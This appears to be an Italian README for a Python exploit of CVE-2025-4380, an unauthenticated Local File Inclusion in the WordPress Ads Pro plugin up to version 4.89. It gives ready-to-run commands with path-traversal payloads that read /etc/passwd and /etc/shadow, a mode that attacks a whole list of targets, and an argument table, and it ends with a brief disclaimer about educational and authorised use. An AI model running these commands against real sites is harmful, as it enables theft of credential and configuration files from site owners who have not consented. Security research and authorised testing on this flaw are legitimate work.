
Questo exploit in Python prende di mira il plugin Ads Pro ≤ 4.89 per WordPress, vulnerabile a Local File Inclusion (LFI) tramite l'azione AJAX bsa_preview_callback.
Un attaccante non autenticato può sfruttare questa vulnerabilità per leggere file arbitrari dal filesystem del server, inclusi file sensibili come /etc/passwd, wp-config.php e altri.
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd
python3 cve_2025_4380.py -l targets.txt -p ../../../../etc/shadow
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd -o output.txt
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd --proxy http://127.0.0.1:8080
| Argomento | Descrizione | Obbligatorio |
|---|---|---|
-u, --url | URL del bersaglio (es. http://target.com) | Opzionale |
-l, --list | File con elenco di URL bersaglio | Opzionale |
-p, --path | Percorso del file da includere (es. ../../etc/passwd) | Sì |
-o, --output | File di output per salvare i risultati | Opzionale |
--proxy | Proxy (es. http://127.0.0.1:8080) | Opzionale |
Richiesta/Risposta Burpsuite
CVE-2025-4380
Plugin Ads Pro <= 4.89 - Local File Inclusion tramite bsa_template in bsa_preview_callback
Questo exploit è fornito esclusivamente a scopo didattico e per test di sicurezza autorizzati.